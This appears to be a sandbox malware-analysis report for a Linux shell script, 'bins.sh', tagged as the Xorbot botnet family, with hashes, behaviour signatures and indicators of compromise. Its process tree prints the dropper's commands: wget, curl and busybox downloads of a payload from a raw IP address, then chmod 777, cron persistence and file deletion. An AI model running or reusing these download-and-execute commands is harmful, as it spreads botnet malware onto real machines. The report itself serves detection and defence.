Analysis
-
max time kernel
140s -
max time network
153s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
20-02-2025 22:13
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
470cc0216b2f04a8f0da2d4a879c25b9
-
SHA1
cde638aab873b8c3bf20bef9963686a2e985893a
-
SHA256
27f0a947bccc3033e141bf1929542179446faba00253b9f830edb2ce0f92bd24
-
SHA512
38734d0e7701ffe55e58f4ac2e57f365c970a03a315c8ce390c58b2ecd453369795dd1d7b049d96f01f2a025368287ec22795e2643df72798bf7175cf84130bb
-
SSDEEP
192:RuR1a7TGGBS6+C7Qocnzg54AFdamU+C7QoCnzk4AFdamwR1a7TO:RqGBSHnzg54AFdamdnzk4AFdamk
Malware Config
Signatures
-
resource yara_rule behavioral1/files/fstream-1.dat family_xorbot -
Xorbot family
-
Contacts a large (2223) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1498 chmod -
Executes dropped EXE 1 IoCs
ioc pid Process /tmp/ztUToCA2tFwidfWCYYmibc3UfsTJzWtw6h 1499 bins.sh -
Renames itself 1 IoCs
pid Process 1500 bins.sh -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.dQHZ7y crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
description ioc Process File opened for reading /proc/586/cmdline bins.sh File opened for reading /proc/84/cmdline bins.sh File opened for reading /proc/1601/cmdline bins.sh File opened for reading /proc/1673/cmdline bins.sh File opened for reading /proc/1702/cmdline bins.sh File opened for reading /proc/1713/cmdline bins.sh File opened for reading /proc/164/cmdline bins.sh File opened for reading /proc/1551/cmdline bins.sh File opened for reading /proc/1584/cmdline bins.sh File opened for reading /proc/1593/cmdline bins.sh File opened for reading /proc/1647/cmdline bins.sh File opened for reading /proc/1667/cmdline bins.sh File opened for reading /proc/25/cmdline bins.sh File opened for reading /proc/85/cmdline bins.sh File opened for reading /proc/1123/cmdline bins.sh File opened for reading /proc/1241/cmdline bins.sh File opened for reading /proc/1275/cmdline bins.sh File opened for reading /proc/1558/cmdline bins.sh File opened for reading /proc/1681/cmdline bins.sh File opened for reading /proc/1711/cmdline bins.sh File opened for reading /proc/115/cmdline bins.sh File opened for reading /proc/9/cmdline bins.sh File opened for reading /proc/14/cmdline bins.sh File opened for reading /proc/30/cmdline bins.sh File opened for reading /proc/1544/cmdline bins.sh File opened for reading /proc/1595/cmdline bins.sh File opened for reading /proc/160/cmdline bins.sh File opened for reading /proc/153/cmdline bins.sh File opened for reading /proc/1142/cmdline bins.sh File opened for reading /proc/1528/cmdline bins.sh File opened for reading /proc/1602/cmdline bins.sh File opened for reading /proc/1610/cmdline bins.sh File opened for reading /proc/1658/cmdline bins.sh File opened for reading /proc/626/cmdline bins.sh File opened for reading /proc/666/cmdline bins.sh File opened for reading /proc/1173/cmdline bins.sh File opened for reading /proc/1524/cmdline bins.sh File opened for reading /proc/1575/cmdline bins.sh File opened for reading /proc/1672/cmdline bins.sh File opened for reading /proc/1692/cmdline bins.sh File opened for reading /proc/1007/cmdline bins.sh File opened for reading /proc/1543/cmdline bins.sh File opened for reading /proc/432/cmdline bins.sh File opened for reading /proc/588/cmdline bins.sh File opened for reading /proc/1312/cmdline bins.sh File opened for reading /proc/1580/cmdline bins.sh File opened for reading /proc/1642/cmdline bins.sh File opened for reading /proc/1693/cmdline bins.sh File opened for reading /proc/1718/cmdline bins.sh File opened for reading /proc/166/cmdline bins.sh File opened for reading /proc/1087/cmdline bins.sh File opened for reading /proc/1521/cmdline bins.sh File opened for reading /proc/1662/cmdline bins.sh File opened for reading /proc/1683/cmdline bins.sh File opened for reading /proc/31/cmdline bins.sh File opened for reading /proc/1644/cmdline bins.sh File opened for reading /proc/1680/cmdline bins.sh File opened for reading /proc/1706/cmdline bins.sh File opened for reading /proc/198/cmdline bins.sh File opened for reading /proc/425/cmdline bins.sh File opened for reading /proc/453/cmdline bins.sh File opened for reading /proc/531/cmdline bins.sh File opened for reading /proc/1322/cmdline bins.sh File opened for reading /proc/1552/cmdline bins.sh -
Writes file to tmp directory 3 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/ztUToCA2tFwidfWCYYmibc3UfsTJzWtw6h wget File opened for modification /tmp/ztUToCA2tFwidfWCYYmibc3UfsTJzWtw6h curl File opened for modification /tmp/ztUToCA2tFwidfWCYYmibc3UfsTJzWtw6h busybox
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:1483 -
/bin/rm/bin/rm bins.sh2⤵PID:1484
-
-
/usr/bin/wgetwget http://37.44.238.88/bins/ztUToCA2tFwidfWCYYmibc3UfsTJzWtw6h2⤵
- Writes file to tmp directory
PID:1487
-
-
/usr/bin/curlcurl -O http://37.44.238.88/bins/ztUToCA2tFwidfWCYYmibc3UfsTJzWtw6h2⤵
- Writes file to tmp directory
PID:1496
-
-
/bin/busybox/bin/busybox wget http://37.44.238.88/bins/ztUToCA2tFwidfWCYYmibc3UfsTJzWtw6h2⤵
- Writes file to tmp directory
PID:1497
-
-
/bin/chmodchmod 777 ztUToCA2tFwidfWCYYmibc3UfsTJzWtw6h2⤵
- File and Directory Permissions Modification
PID:1498
-
-
/usr/bin/crontabcrontab -l2⤵PID:1502
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1504
-
-
/bin/rmrm ztUToCA2tFwidfWCYYmibc3UfsTJzWtw6h2⤵PID:1514
-
-
/usr/bin/wgetwget http://37.44.238.88/bins/M3lBdkNaVO6pksoPe9DnytjJErYnQBfufT2⤵PID:1517
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
98KB
MD55141342d0df8699fa32a6b066a0c592e
SHA18157673225bd5182f16215e2aa823a25ca2d4fbc
SHA25654302d130cd356fb19ea5a763c5ab6b0892fc234118f10ba3196ec4245c83b4d
SHA512d6b24571e7691227abafc70133a1da007c97c2730c820de77a750d2c140a8a75554cc614b4729debc4ec5480124252737c5846a458a5146005285c6d3f9e3801
-
Filesize
210B
MD5c48aa67930f19b0236d3ceb0aa6865cd
SHA14669d6e7cde2fcf3812c28ca3f050b3530b8bae2
SHA256a4888356ef367570debcc37ba0bde01fa72c7ec96eedfc822fe71abb01b2cf2b
SHA512e0a90e81a7f400a5fae8324347cec1f091e4588ad39e7a8839748d7b04ed33042c7eb54224ef60a3ab48e77c2f893fd83bb8c7c63814707b8728a6d6139dabff